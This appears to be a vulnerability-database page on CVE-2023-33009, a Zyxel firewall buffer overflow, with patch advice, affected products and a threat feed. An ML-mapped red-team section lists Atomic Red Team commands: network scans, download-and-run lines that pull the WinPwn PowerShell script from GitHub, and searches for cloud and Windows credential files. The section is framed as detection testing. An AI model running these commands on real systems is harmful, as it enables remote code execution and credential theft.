CVE-2023-33009
Overview
This vulnerability is a buffer overflow caused by improper handling of input data within the notification function of Zyxel ATP series firmware and related products. The root cause lies in insufficient bounds checking when processing notification messages, leading to memory corruption. The flaw affects multiple firmware versions across Zyxel ATP, USG FLEX, USG20(W)-VPN, VPN series, and ZyWALL/USG series devices.
Vulnerability Description
A buffer overflow vulnerability in the notification function in Zyxel ATP series firmware versions 4.60 through 5.36 Patch 1, USG FLEX series firmware versions 4.60 through 5.36 Patch 1, USG FLEX 50(W) firmware versions 4.60 through 5.36 Patch 1, USG20(W)-VPN firmware versions 4.60 through 5.36 Patch 1, VPN series firmware versions 4.60 through 5.36 Patch 1, ZyWALL/USG series firmware versions 4.60 through 4.73 Patch 1, could allow an unauthenticated attacker to cause denial-of-service (DoS) conditions and even a remote code execution on an affected device.
Impact
An unauthenticated attacker can exploit this vulnerability remotely to cause denial-of-service or execute arbitrary code on the affected device. This can lead to full system compromise, allowing the attacker to control the firewall or VPN appliance, intercept or manipulate network traffic, and disrupt business operations. No user interaction or credentials are required, making the attack vector highly accessible and dangerous.
Solution
Zyxel has released security advisories addressing multiple buffer overflow vulnerabilities in their firewall products. Users should upgrade affected Zyxel ATP series firmware and related product firmware to versions later than 5.36 Patch 1. Detailed patch instructions and advisory information are available at Zyxel's official security advisory page: https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-multiple-buffer-overflow-vulnerabilities-of-firewalls
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A critical buffer overflow vulnerability has been identified in the notification function of various Zyxel firmware versions, affecting multiple product lines including the ATP series, USG FLEX series, and others. Buffer overflow vulnerabilities occur when a program writes more data to a buffer than it can hold, potentially leading to arbitrary code execution or denial-of-service (DoS) conditions. In this case, the flaw allows an unauthenticated attacker to exploit the notification function, which is likely to process incoming messages or alerts. By sending specially crafted input, an attacker can overwrite the memory of the affected device, leading to unpredictable behavior, crashes, or the execution of malicious code.
The attack vectors associated with this vulnerability are particularly concerning due to the potential for remote exploitation. An attacker could leverage this flaw without needing any form of authentication, significantly lowering the barrier to entry for exploitation. Scenarios may include sending malformed notifications over the network, which could be executed by the device's firmware. This could lead to a complete compromise of the device, allowing the attacker to gain control over the network infrastructure, intercept sensitive data, or launch further attacks against internal systems. The ease of exploitation combined with the widespread deployment of affected devices amplifies the risk.
The real-world impact of this vulnerability is substantial, especially for organizations relying on Zyxel products for network security and management. A successful exploitation could result in prolonged downtime, loss of data integrity, and potential breaches of sensitive information. Businesses may face significant financial losses due to operational disruptions and the costs associated with incident response and recovery. Furthermore, the reputational damage from a security breach can have long-lasting effects, eroding customer trust and impacting future business opportunities. The high CVSS score of 9.8 underscores the severity of this vulnerability, indicating that it poses a critical risk to affected organizations.
Detection and mitigation strategies are essential to protect against this vulnerability. Organizations should prioritize updating their Zyxel devices to the latest firmware versions that address this flaw. Regular vulnerability assessments and penetration testing can help identify potential weaknesses in the network infrastructure, allowing for timely remediation. Additionally, implementing network segmentation can limit the exposure of critical devices to potential attackers. Monitoring network traffic for unusual patterns or anomalies can also serve as an early warning system for attempted exploits. Employing intrusion detection and prevention systems (IDPS) can further enhance security by identifying and blocking malicious activities in real-time.
In conclusion, the buffer overflow vulnerability in Zyxel firmware presents a significant threat to organizations utilizing these devices. The potential for remote exploitation without authentication, coupled with the severe consequences of successful attacks, necessitates immediate attention and action from affected users. By understanding the technical details, attack vectors, and real-world implications, organizations can better prepare their defenses and mitigate the risks associated with this critical vulnerability.
Affected Products (69)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Zyxel | Atp100 Firmware | All |
cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Atp100 Firmware | 5.36 |
cpe:2.3:o:zyxel:atp100_firmware:5.36:-:*:*:*:*:*:*
|
|
|
Zyxel | Atp100 Firmware | 5.36 |
cpe:2.3:o:zyxel:atp100_firmware:5.36:patch1:*:*:*:*:*:*
|
|
|
Zyxel | Atp200 Firmware | All |
cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Atp200 Firmware | 5.36 |
cpe:2.3:o:zyxel:atp200_firmware:5.36:-:*:*:*:*:*:*
|
|
|
Zyxel | Atp200 Firmware | 5.36 |
cpe:2.3:o:zyxel:atp200_firmware:5.36:patch1:*:*:*:*:*:*
|
|
|
Zyxel | Atp500 Firmware | All |
cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Atp500 Firmware | 5.36 |
cpe:2.3:o:zyxel:atp500_firmware:5.36:-:*:*:*:*:*:*
|
|
|
Zyxel | Atp500 Firmware | 5.36 |
cpe:2.3:o:zyxel:atp500_firmware:5.36:patch1:*:*:*:*:*:*
|
|
|
Zyxel | Atp100w Firmware | All |
cpe:2.3:o:zyxel:atp100w_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Atp100w Firmware | 5.36 |
cpe:2.3:o:zyxel:atp100w_firmware:5.36:-:*:*:*:*:*:*
|
|
|
Zyxel | Atp100w Firmware | 5.36 |
cpe:2.3:o:zyxel:atp100w_firmware:5.36:patch1:*:*:*:*:*:*
|
|
|
Zyxel | Atp700 Firmware | All |
cpe:2.3:o:zyxel:atp700_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Atp700 Firmware | 5.36 |
cpe:2.3:o:zyxel:atp700_firmware:5.36:-:*:*:*:*:*:*
|
|
|
Zyxel | Atp700 Firmware | 5.36 |
cpe:2.3:o:zyxel:atp700_firmware:5.36:patch1:*:*:*:*:*:*
|
|
|
Zyxel | Atp800 Firmware | All |
cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Atp800 Firmware | 5.36 |
cpe:2.3:o:zyxel:atp800_firmware:5.36:-:*:*:*:*:*:*
|
|
|
Zyxel | Atp800 Firmware | 5.36 |
cpe:2.3:o:zyxel:atp800_firmware:5.36:patch1:*:*:*:*:*:*
|
|
|
Zyxel | Usg Flex 100 Firmware | All |
cpe:2.3:o:zyxel:usg_flex_100_firmware:*:*:*:*:*:*:*:*
|
|
|
Zyxel | Usg Flex 100 Firmware | 5.36 |
cpe:2.3:o:zyxel:usg_flex_100_firmware:5.36:-:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-33009 |
| zyxel.com |
GitHub CVE
|
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-multiple-buffer-overflow-vulnerabilities-of-firewalls |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-33009 |